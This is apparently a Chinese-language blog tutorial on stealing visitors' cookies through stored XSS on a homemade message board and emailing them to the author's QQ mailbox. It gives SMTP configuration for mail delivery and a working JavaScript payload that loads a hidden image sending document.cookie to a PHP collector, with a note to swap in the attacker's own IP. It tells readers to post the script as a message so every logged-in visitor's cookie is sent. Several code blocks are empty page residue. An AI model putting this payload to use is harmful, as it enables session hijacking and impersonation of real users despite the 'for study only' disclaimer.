XSS获取cookie并发送自己邮箱

关于XSS获取cookie并发送到自己邮箱，这里我用自己做的简易留言板做个示范

注意：本教程仅供学习交流

xss获取用户cookie如此简单，你学会了吗？

利用别人的cookie，他们可以冒充真实的用户，在颁发cookie的那个网站中为所欲为，个人隐私在他们面前根本不存...

这是登录界面，输入用户名和密码登录后

可以对留言内容进行XSS尝试，没有作任何过滤，所以存在XSS的，这里不详细演示了，只看怎么获取cookie吧

代码语言：javascript代码运行次数：0运行复制

这里可以看出cookie已经出来了，我们现在就是想别人登录时能够获取到别人的cookie

然后我自己写了个小脚本，用来获取别人的cookie

同样的方法插入xss代码，如果别人登录将会把别人的cookie发送到我邮箱里

因为是用php和js写的，所以我这里将php发送qq邮箱的方法说一下，毕竟这是困我好久的难题。

其实方法也不难，不过遇到各种各样的麻烦

需要配置sendmail，这是windows下的配置

点击帐户,然后开启下图服务

（2）验证密保（开启可能要验证密保）

（3）生成授权码（授权码就是下面要用的东西，忘了图一会看到有生成授权码，没必要详记）

（4）配置sendmail文件

代码语言：javascript代码运行次数：0运行复制

以下都是修改项[sendmail] ; you must change mail.mydomain.com to your smtp server smtp_server=smtp.qq.com smtp_port=465 //特别注意：端口这里是465，不是25，网上有很多填25，腾讯邮箱特别说明了为465auth_username=QQ号码@qq.comauth_password=授权码 //注意：这里是qq授权码不是邮箱密码force_sender=QQ号码@qq.com

代码语言：javascript代码运行次数：0运行复制

[mail function] ; For Win32 only. SMTP = smtp.qq.com //因为是qq邮箱smtp_port = 25 ; For Win32 only. sendmail_from = qq号@qq.com ; For Unix only. You may supply arguments as well (default: “sendmail -t -i”). sendmail_path = “E:\wamp64\sendmail\sendmail.exe -t”//修改成自己的路径

然后开始用自己的脚本试试了，php发送邮件的脚本很容易，然后再加上获取cookie的js脚本，就成了

代码语言：javascript代码运行次数：0运行复制

代码语言：javascript代码运行次数：0运行复制

var img = document.createElement('img');img.width = 0;img.height = 0;img.src = 'http://localhost/project/1.php?joke='+encodeURIComponent(document.cookie);//这里是用本地环境测试的，可以换成自己的ip地址

然后就可以用了

代码语言：javascript代码运行次数：0运行复制

 //joke.js是我的js文件名

将这段代码留言就可以看到cookie了，任何人登录都可以收到他cookie

上面是本地测试，大家可以自己搭建一下环境，充当一下攻击者测试一下